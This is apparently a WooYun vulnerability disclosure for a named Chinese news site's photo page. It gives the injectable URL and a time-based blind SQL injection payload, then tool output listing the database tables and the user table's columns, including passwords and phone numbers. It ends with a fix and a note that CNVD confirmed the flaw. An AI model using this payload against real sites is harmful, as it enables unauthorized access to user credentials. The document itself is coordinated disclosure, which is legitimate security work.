WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles, online reader -------- http://drop.zone.ci/
2015-04-14: Details reported to the vendor, awaiting vendor processing
2015-04-16: Vendor confirmed; details disclosed to the vendor only
2015-04-26: Details disclosed to core white hats and experts in the relevant field
2015-05-06: Details disclosed to ordinary white hats
2015-05-16: Details disclosed to intern white hats
2015-05-31: Details disclosed to the public
China Ningbo Net (owned by Ningbo Daily) has a SQL injection vulnerability through which the database and other sensitive information can be obtained
Injection point: http://pic.cnnb.com.cn/showtheme.php?themeid=125119&columnid=photoclass18
---
Place: GET
Parameter: themeid
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: themeid=125040 AND SLEEP(5)&columnid=photoclass18
---
[14:37:47] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 5
web application technology: Apache 2.2.3, PHP 5.2.17
back-end DBMS: MySQL 5.0.11
[14:37:47] [INFO] fetching current database
[14:37:47] [WARNING] time-based comparison needs larger statistical model. Making a few dummy requests, please wait..
[14:38:03] [WARNING] adjusting time delay to 1 second
[14:38:54] [ERROR] invalid character detected. retrying..
[14:38:54] [WARNING] adjusting time delay to 2 seconds
[14:40:53] [ERROR] invalid character detected. retrying..
[14:40:53] [WARNING] adjusting time delay to 3 seconds
current database: 'photo'

Database: photo
[24 tables]
+----------------------+
| pagetemplate         |
| property             |
| propertyvalue        |
| rectheme             |
| result               |
| temp1                |
| temp1a               |
| temp1b               |
| temp1c               |
| temp1d               |
| temp2                |
| temp3                |
| temp3a               |
| temp3b               |
| temp3c               |
| temp3d               |
| temp3e               |
| theme                |
| theme_pic            |
| themeproperty        |
| themesubjectcolumn   |
| themesubjectlocation |
| user                 |
| usergroup            |
+----------------------+

Database: photo
Table: user
[11 columns]
+---------------+---------------+
| Column        | Type          |
+---------------+---------------+
| ``            |               |
| factname      |               |
| groupid       | int(11)       |
| userid        | int(11)       |
| userintro     | varchar(8000) |
| username      | varchar(255)  |
| userpassed    | int(11)       |
| userpassword  | varchar(255)  |
| userpic       | varchar(255)  |
| usertelephone | varchar(255)  |
| userworkunit  | varchar(255)  |
+---------------+---------------+
Filter the themeid parameter.
Severity: Medium
Vulnerability Rank: 9
Confirmed: 2015-04-16 17:42
CNVD confirmed and reproduced the described vulnerability; it has been forwarded through CNCERT to the Zhejiang branch center, which will coordinate handling with the unit administering the website.
None yet